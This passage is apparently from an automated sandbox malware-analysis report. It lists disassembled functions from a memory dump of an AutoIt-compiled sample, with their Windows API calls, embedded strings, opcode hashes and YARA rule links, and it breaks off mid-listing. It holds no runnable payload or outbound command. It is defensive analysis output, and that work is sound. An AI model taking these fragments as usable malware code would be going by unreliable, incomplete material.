                                              • Instruction Fuzzy Hash: 52A0113002020CEB8A002B82EC08888BFACEA882A0B008020F80C020228B32A8208A88
                                              Function 00BA7EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BA7F45
                                              • DeleteObject.GDI32(00000000), ref: 00BA7F57
                                              • DestroyWindow.USER32 ref: 00BA7F65
                                              • GetDesktopWindow.USER32 ref: 00BA7F7F
                                              • GetWindowRect.USER32(00000000), ref: 00BA7F86
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BA80C7
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BA80D7
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA811F
                                              • GetClientRect.USER32(00000000,?), ref: 00BA812B
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BA8165
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA8187
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA819A
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81A5
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81AE
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81BD
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81C6
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81CD
                                              • GlobalFree.KERNEL32(00000000), ref: 00BA81D8
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81EA
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BC3C7C,00000000), ref: 00BA8200
                                              • GlobalFree.KERNEL32(00000000), ref: 00BA8210
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BA8236
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BA8255
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA8277
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA8464
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 6fd7d45649a43e95d6a63be65249590c43591fdfcdf152a7015a2c5d55732ea2
                                              • Instruction ID: 984c7896ae847492f0a62aeb42c93db905609fc736ac3619b26d3af44680d0d6
                                              • Opcode Fuzzy Hash: 6fd7d45649a43e95d6a63be65249590c43591fdfcdf152a7015a2c5d55732ea2
                                              • Instruction Fuzzy Hash: A0025D71910119EFDB14EF64CC89EAEBBF9FB49310F148199F915AB2A1CB31AD41CB60
                                              Function 00BB3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,00BC0980), ref: 00BB3C65
                                              • IsWindowVisible.USER32(?), ref: 00BB3C89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: 5c1943d945c6359aec40623535adbae7c208e906f7b4f0d517d263141d6e4c52
                                              • Instruction ID: 982652d5066295cc527ecc89dd0223b2eeca81b53c5d76d751fd19015485e0d1
                                              • Opcode Fuzzy Hash: 5c1943d945c6359aec40623535adbae7c208e906f7b4f0d517d263141d6e4c52
                                              • Instruction Fuzzy Hash: 38D16C302142158BCB14FF50C591ABABBF5EF94744F2448E8F8965B2E2CB71EE4ACB51
                                              Function 00BBABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00BBAC55
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BBAC86
                                              • GetSysColor.USER32(0000000F), ref: 00BBAC92
                                              • SetBkColor.GDI32(?,000000FF), ref: 00BBACAC
                                              • SelectObject.GDI32(?,?), ref: 00BBACBB
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BBACE6
                                              • GetSysColor.USER32(00000010), ref: 00BBACEE
                                              • CreateSolidBrush.GDI32(00000000), ref: 00BBACF5
                                              • FrameRect.USER32(?,?,00000000), ref: 00BBAD04
                                              • DeleteObject.GDI32(00000000), ref: 00BBAD0B
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00BBAD56
                                              • FillRect.USER32(?,?,?), ref: 00BBAD88
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BBADB3
                                                • Part of subcall function 00BBAF18: GetSysColor.USER32(00000012), ref: 00BBAF51
                                                • Part of subcall function 00BBAF18: SetTextColor.GDI32(?,?), ref: 00BBAF55
                                                • Part of subcall function 00BBAF18: GetSysColorBrush.USER32(0000000F), ref: 00BBAF6B
                                                • Part of subcall function 00BBAF18: GetSysColor.USER32(0000000F), ref: 00BBAF76
                                                • Part of subcall function 00BBAF18: GetSysColor.USER32(00000011), ref: 00BBAF93
                                                • Part of subcall function 00BBAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BBAFA1
                                                • Part of subcall function 00BBAF18: SelectObject.GDI32(?,00000000), ref: 00BBAFB2
                                                • Part of subcall function 00BBAF18: SetBkColor.GDI32(?,00000000), ref: 00BBAFBB
                                                • Part of subcall function 00BBAF18: SelectObject.GDI32(?,?), ref: 00BBAFC8
                                                • Part of subcall function 00BBAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00BBAFE7
                                                • Part of subcall function 00BBAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BBAFFE
                                                • Part of subcall function 00BBAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00BBB013
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID:
                                              • API String ID: 4124339563-0
                                              • Opcode ID: 9cc1fce89f86b8687b22a52971c320940386d602366cd1c72272d24d5fcaedef
                                              • Instruction ID: 288945597c04a5a82ea334d06d26770a2ae8571b881cc1cc4fea36047c8f39c7
                                              • Opcode Fuzzy Hash: 9cc1fce89f86b8687b22a52971c320940386d602366cd1c72272d24d5fcaedef
                                              • Instruction Fuzzy Hash: 64A16C72418301EFD711AF64DC48EABBBE9FF88321F140A29F966971A0DB71D944CB52
                                              Function 00B32FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?,?), ref: 00B33072
                                              • DeleteObject.GDI32(00000000), ref: 00B330B8
                                              • DeleteObject.GDI32(00000000), ref: 00B330C3
                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00B330CE
                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00B330D9
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B6C77C
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B6C7B5
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B6CBDE
                                                • Part of subcall function 00B31F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B32412,?,00000000,?,?,?,?,00B31AA7,00000000,?), ref: 00B31F76
                                              • SendMessageW.USER32(?,00001053), ref: 00B6CC1B
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B6CC32
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B6CC48
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B6CC53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                              • String ID: 0
                                              • API String ID: 464785882-4108050209
                                              • Opcode ID: 6ddef694815aaa2ef65798f3e30b2da07a771cd3004157af819c7d5fbab4cadf
                                              • Instruction ID: 215ab87f765759747140270aab1dad00bb4e86b55332bf249535413b2d3cd7b0
                                              • Opcode Fuzzy Hash: 6ddef694815aaa2ef65798f3e30b2da07a771cd3004157af819c7d5fbab4cadf
                                              • Instruction Fuzzy Hash: 86128D34604201EFDB25DF24C885BBABBE5FF08710F2445A9E999CB262CB35ED41CB91
                                              Function 00B427FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 2660009612-1645009161
                                              • Opcode ID: baf005d9e1cc8dffe65a8656ca7753d3e20c27916a0a441f6836134ef3a80666
                                              • Instruction ID: 364c8d2a802782d80e8033a6583f878a09d208c96729cfdf83ef754f39a3c5a2
                                              • Opcode Fuzzy Hash: baf005d9e1cc8dffe65a8656ca7753d3e20c27916a0a441f6836134ef3a80666
                                              • Instruction Fuzzy Hash: 10A19F70A0020AABCB11AF65DC82FBE37E4EF54B40F5440E9FC15AB292EB719B55E750
                                              Function 00BA7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00BA7BC8
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BA7C87
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BA7CC5
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BA7CD7
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BA7D1D
                                              • GetClientRect.USER32(00000000,?), ref: 00BA7D29
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BA7D6D
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BA7D7C
                                              • GetStockObject.GDI32(00000011), ref: 00BA7D8C
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BA7D90
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BA7DA0
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA7DA9
                                              • DeleteDC.GDI32(00000000), ref: 00BA7DB2
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BA7DDE
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BA7DF5
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BA7E30
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BA7E44
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BA7E55
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BA7E85
                                              • GetStockObject.GDI32(00000011), ref: 00BA7E90
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BA7E9B
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BA7EA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: b25497bfb843a1aae3526d5718687bc4b8f230cce980da616c4ba78542620492
                                              • Instruction ID: 26c13c593eb74e45edc9f9aafec4617aec5147fd0414b1e6428e27d6073585eb
                                              • Opcode Fuzzy Hash: b25497bfb843a1aae3526d5718687bc4b8f230cce980da616c4ba78542620492
                                              • Instruction Fuzzy Hash: 0CA16271A54219BFEB14DB68DC4AFAF7BB9EB09710F144154FA15A72E0DB70AD00CB60
                                              Function 00B9B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00B9B361
                                              • GetDriveTypeW.KERNEL32(?,00BC2C4C,?,\\.\,00BC0980), ref: 00B9B43E
                                              • SetErrorMode.KERNEL32(00000000,00BC2C4C,?,\\.\,00BC0980), ref: 00B9B59C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: dafa65ee74677fd66ef5d1f1865f94418d2862382c166b5f3636abf0b9c935fd
                                              • Instruction ID: 1c547464734cd6875dc00d701bce3462ec8d2c10393a07c1c4d0bc7d36f513bf
                                              • Opcode Fuzzy Hash: dafa65ee74677fd66ef5d1f1865f94418d2862382c166b5f3636abf0b9c935fd
                                              • Instruction Fuzzy Hash: A151A430B44209EBCF00EB61EAD2E7E77E0EB54740B2540F5E406A76B1DB71AE81DB55
                                              Function 00BBA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BBA0F7
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BBA1B0
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BBA1CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: fa54b2223e3d11fd21be7ee1bea13415dac198f18d39d9331ec2dd86b810a3d3
                                              • Instruction ID: 2b040a923ac5216d288e09c0cb9042adf5abbc89cf2ea7fd9f52be32c5ccd61a
                                              • Opcode Fuzzy Hash: fa54b2223e3d11fd21be7ee1bea13415dac198f18d39d9331ec2dd86b810a3d3
                                              • Instruction Fuzzy Hash: 0902CD70908301AFD725CF18C888BFABBE4FF89714F0485A9F995972A1CBB5D944CB52
                                              Function 00BBAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00BBAF51
                                              • SetTextColor.GDI32(?,?), ref: 00BBAF55
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BBAF6B
                                              • GetSysColor.USER32(0000000F), ref: 00BBAF76
                                              • CreateSolidBrush.GDI32(?), ref: 00BBAF7B
                                              • GetSysColor.USER32(00000011), ref: 00BBAF93
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BBAFA1
                                              • SelectObject.GDI32(?,00000000), ref: 00BBAFB2
                                              • SetBkColor.GDI32(?,00000000), ref: 00BBAFBB
                                              • SelectObject.GDI32(?,?), ref: 00BBAFC8
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BBAFE7
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BBAFFE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BBB013
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BBB05F
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BBB086
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00BBB0A4
                                              • DrawFocusRect.USER32(?,?), ref: 00BBB0AF
                                              • GetSysColor.USER32(00000011), ref: 00BBB0BD
                                              • SetTextColor.GDI32(?,00000000), ref: 00BBB0C5
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BBB0D9
                                              • SelectObject.GDI32(?,00BBAC1F), ref: 00BBB0F0
                                              • DeleteObject.GDI32(?), ref: 00BBB0FB
                                              • SelectObject.GDI32(?,?), ref: 00BBB101
                                              • DeleteObject.GDI32(?), ref: 00BBB106
                                              • SetTextColor.GDI32(?,?), ref: 00BBB10C
                                              • SetBkColor.GDI32(?,?), ref: 00BBB116
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: 87bfaa6c2c188dce75d337170f2e77e991cddf0c329259dd327412d7a8f41898
                                              • Instruction ID: cd6b266e0781a6ddfe98929781246b63ef0e49e4b0722f63db4bfdbbaafbaa57
                                              • Opcode Fuzzy Hash: 87bfaa6c2c188dce75d337170f2e77e991cddf0c329259dd327412d7a8f41898
                                              • Instruction Fuzzy Hash: 3D614C71910218EFDF11AFA4DC88EEEBBB9EF08320F154155F915AB2A1DBB59940CF90
                                              Function 00BB8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BB90EA
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB90FB
                                              • CharNextW.USER32(0000014E), ref: 00BB912A
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BB916B
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BB9181
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB9192
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BB91AF
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BB91FB
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BB9211
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB9242
                                              • _memset.LIBCMT ref: 00BB9267
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BB92B0
                                              • _memset.LIBCMT ref: 00BB930F
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BB9339
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BB9391
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00BB943E
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BB9460
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB94AA
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB94D7
                                              • DrawMenuBar.USER32(?), ref: 00BB94E6
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00BB950E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: f57cbd95c1b0c4bad8869b16a70f106952ff19b1ec67e1a81f4c27b198505f94
                                              • Instruction ID: bcc1471029ee04cb43bfbf605f148a2a9e239f4fb2ede5b01708c608e60d28ac
                                              • Opcode Fuzzy Hash: f57cbd95c1b0c4bad8869b16a70f106952ff19b1ec67e1a81f4c27b198505f94
                                              • Instruction Fuzzy Hash: 3AE16071904209ABDB21AF55CC84EFE7BF8EF09710F1081D5FA15AB291DBB08A85DF61
                                              Function 00BB4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00BB5007
                                              • GetDesktopWindow.USER32 ref: 00BB501C
                                              • GetWindowRect.USER32(00000000), ref: 00BB5023
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BB5085
                                              • DestroyWindow.USER32(?), ref: 00BB50B1
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BB50DA
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB50F8
